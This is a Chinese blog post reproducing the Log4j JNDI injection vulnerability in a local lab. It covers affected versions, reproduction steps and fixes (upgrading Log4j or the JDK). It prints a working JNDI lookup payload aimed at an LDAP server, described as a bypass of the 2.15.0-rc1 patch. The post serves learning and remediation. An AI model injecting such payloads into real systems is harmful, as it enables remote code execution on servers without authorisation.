该漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。
漏洞原理
利用jndi的Lookup功能,实现jndi注入命令执行
影响范围
log4j 2.0-beta9到2.15.0(1.* 版本不受影响)
复现环境
jdk: 1.8.0_181
log4j:2.14.1
OS:Win10
复现步骤
1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。
能解析${}表达式的才存在漏洞,官网的log4j库已经修复了,无法解析该表达式,需要找老的库来复现。
2. 验证外部传入表达式${}能否解析
3.开启JNDI注入利用工具
设置执行打开计算器的命令,开启后得到rmi和ldap的地址
4.利用jndi注入
官方随后出的补丁版本2.15.0-rc1也是可以绕过继续注入的,绕过方法为带空格的异形URI地址(127.0.0.1:8888/和exp之间):${jndi:ldap://127.0.0.1:8888/ exp}
嗯,补得很好,下次不要再补了
漏洞修复
1. 下载官网最新版的log4j(2.16.0)版本就行了
2. 建议JDK使用6u211、7u201、8u191、11.0.1及以上的版本(网上看到的,本人未验证过)
正好机器上有jdk13,咱是勤劳而严谨的人儿,还是要验证一把
重新建一个jdk13的springboot工程,依然还是同一个log4j库,执行结果如下:
${}表达式依然是可以执行的,只是jndi注入无法执行了。嗯,升级jdk是可行的。
本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。
如需转载,请注明出处,这是对他人劳动成果的尊重。